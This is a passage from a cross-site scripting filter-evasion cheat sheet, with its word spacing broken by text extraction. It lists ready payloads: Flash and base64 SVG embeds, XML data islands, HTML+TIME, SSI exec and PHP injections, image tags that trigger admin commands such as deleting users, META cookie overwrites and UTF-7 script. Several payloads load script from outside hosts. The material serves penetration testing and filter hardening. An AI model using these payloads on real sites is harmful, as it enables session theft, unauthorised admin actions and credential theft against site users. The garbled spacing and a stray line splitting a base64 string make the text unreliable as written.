UsinganEMBEDtagyoucanembedaFlashmoviethatcontainsXSS.Clickhereforademo.Ifyou addtheattributesallow ScriptAccess="never"andallow netw orking="internal"itcanmitigatethis risk(thankyoutoJonathanVanascofortheinfo).: <EMBEDSRC="http://ha.ckers.org/xss.sw f" Allow ScriptAccess="alw ays"></EMBED> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

YoucanEMBEDSVGw hichcancontainyourXSSvector.Thisexampleonlyw orksinFirefox, butit'sbetterthantheabovevectorinFirefoxbecauseitdoesnotrequiretheusertohaveFlash turnedonorinstalled.ThankstonEUrOOforthisone.

<EMBED SRC="data:image/svg+xmlbase64,PHN2ZyB4bWxuczp zdmc9Imh0dH A6Ly93d3cudzMub3JnLzIw MDAvc3ZnIiB4bWxucz0iaH Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02] R0cDovL3d3dy53My5vcmcv MjAw MC9zdmciIHhtbG5zOnhsaW5rPSJodHRw Oi8vd3d 3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSI UsingActionScriptinsideflashcanobfuscateyourXSSvector: xOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYX a="get" Njcmlw dCI+YWxlcnQoIlh b="URL(\"" TUyIpOzw vc2NyaXB0Pjw vc3ZnPg==" c="javascript:" type="image/svg+xml" d="alert('XSS')\")" Allow ScriptAccess="alw ays"></EMBED> eval(a+b+c+d) Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

XMLnamespace.ThehtcfilemustbelocatedonthesameserverasyourXSSvector: <HTMLxmlns:xss> <?importnamespace="xss" implementation="http://ha.ckers.org/xss.htc"> <xss:xss>XSS</xss:xss> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02] </HTML>

XMLdataislandw ithCDATAobfuscation(thisXSSattackw orksonlyinIEandNetscape8.1inIE renderingenginemode)vectorfoundbySecConsultw hileauditingYahoo: <XMLID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS')">]]> </C></X></xml><SPANDATASRC=#IDATAFLD=C DATAFORMATAS=HTML></SPAN> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

XMLdataislandw ithcommentobfuscation(thisisanothertakeonthesameexploitthatdoesn't useCDATAfields,butratherusescommentstobreakupthejavascriptdirective): <XMLID="xss"><I><B>&ltIMGSRC="javas<! >cript:alert('XSS')"&gt</B></I></XML> <SPANDATASRC="#xss"DATAFLD="B" DATAFORMATAS="HTML"></SPAN> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

LocallyhostedXMLw ithembeddedJavaScriptthatisgeneratedusinganXMLdataisland.Thisis thesameasabovebutinsteadreferrstoalocallyhosted(mustbeonthesameserver)XMLfile thatcontainsyourcrosssitescriptingvector.Youcanseetheresulthere: <XMLSRC="xsstest.xml"ID=I></XML> <SPANDATASRC=#IDATAFLD=C DATAFORMATAS=HTML></SPAN> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

HTML+TIMEinXML.Thisishow GreyMagichackedHotmailandYahoo!.Thisonlyw orksin InternetExplorerandNetscape8.1inIErenderingenginemodeandrememberthatyouneedtobe betw eenHTMLandBODYtagsforthistow ork: <HTML><BODY> <?xml:namespaceprefix="t"ns="urn:schemas microsoftcom:time"> <?importnamespace="t" Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02] implementation="#default#time2"> <t:setattributeName="innerHTML"to="XSS&ltSCRIPT DEFER&gtalert(&quotXSS&quot)&lt/SCRIPT&gt"> </BODY></HTML> Assumingyoucanonlyfitinafew charactersanditfiltersagainst".js"youcanrenameyour JavaScriptfiletoanimageasanXSSvector: <SCRIPTSRC="http://ha.ckers.org/xss.jpg"></SCRIPT>

Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

SSI(ServerSideIncludes)requiresSSItobeinstalledontheservertousethisXSSvector.I probablydon'tneedtomentionthis,butifyoucanruncommandsontheservertherearenodoubt muchmoreseriousissues: <!#execcmd="/bin/echo'<SCR'"><!#exec cmd="/bin/echo'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

PHPrequiresPHPtobeinstalledontheservertousethisXSSvector.Again,ifyoucanrunany scriptsremotelylikethis,thereareprobablymuchmoredireissues: <?echo('<SCR)' echo('IPT>alert("XSS")</SCRIPT>')?> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

IMGEmbeddedcommandsthisw orksw henthew ebpagew herethisisinjected(likeaw eb board)isbehindpassw ordprotectionandthatpassw ordprotectionw orksw ithothercommands onthesamedomain.Thiscanbeusedtodeleteusers,addusers(iftheuserw hovisitsthepage isanadministrator),sendcredentialselsew here,etc....Thisisoneofthelesserusedbutmore usefulXSSvectors: <IMG SRC="http://w w w .thesiteyouareon.com/somecommand. php?somevariables=maliciouscode"> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

IMGEmbeddedcommandspartIIthisismorescarybecausethereareabsolutelynoidentifiers thatmakeitlooksuspiciousotherthanitisnothostedonyourow ndomain.Thevectorusesa302 or304(othersw orktoo)toredirecttheimagebacktoacommand.Soanormal<IMG SRC="http://badguy.com/a.jpg">couldactuallybeanattackvectortoruncommandsastheuser w hoview stheimagelink.Hereisthe.htaccess(underApache)linetoaccomplishthevector (thankstoTimoforpartofthis): Redirect302/a.jpg http://victimsite.com/admin.asp&deleteuser Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

CookiemanipulationadmittidlythisisprettyobscurebutIhaveseenafew examplesw here <METAisallow edandyoucanuseittooverw ritecookies.Thereareotherexamplesofsites w hereinsteadoffetchingtheusernamefromadatabaseitisstoredinsideofacookietobe displayedonlytotheuserw hovisitsthepage.Withthesetw oscenarioscombinedyoucan modifythevictim'scookiew hichw illbedisplayedbacktothemasJavaScript(youcanalsouse thistologpeopleoutorchangetheiruserstates,getthemtologinasyou,etc...): <METAHTTPEQUIV="SetCookie" Content="USERID=&ltSCRIPT&gtalert('XSS')&lt/SCRIPT &gt"> Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

UTF7encodingifthepagethattheXSSresidesondoesn'tprovideapagecharsetheader,or anybrow serthatissettoUTF7encodingcanbeexploitedw iththefollow ing(ThankstoRoman Ivanovforthisone).Clickhereforanexample(youdon'tneedthecharsetstatementiftheuser's brow serissettoautodetectandthereisnooverridingcontenttypesonthepageinInternet ExplorerandNetscape8.1inIErenderingenginemode).Thisdoesnotw orkinanymodern brow serw ithoutchangingtheencodingtypew hichisw hyitismarkedascompletely unsupported.WatchfirefoundthisholeinGoogle'scustom404script.: <HEAD><METAHTTPEQUIV="CONTENTTYPE" CONTENT="text/htmlcharset=UTF7"></HEAD>+ADw SCRIPT+AD4alert('XSS')+ADw /SCRIPT+AD4 Brow sersupport:[IE7.0|IE6.0|NS8.1IE][NS8.1G|FF2.0][O9.02]

You might also like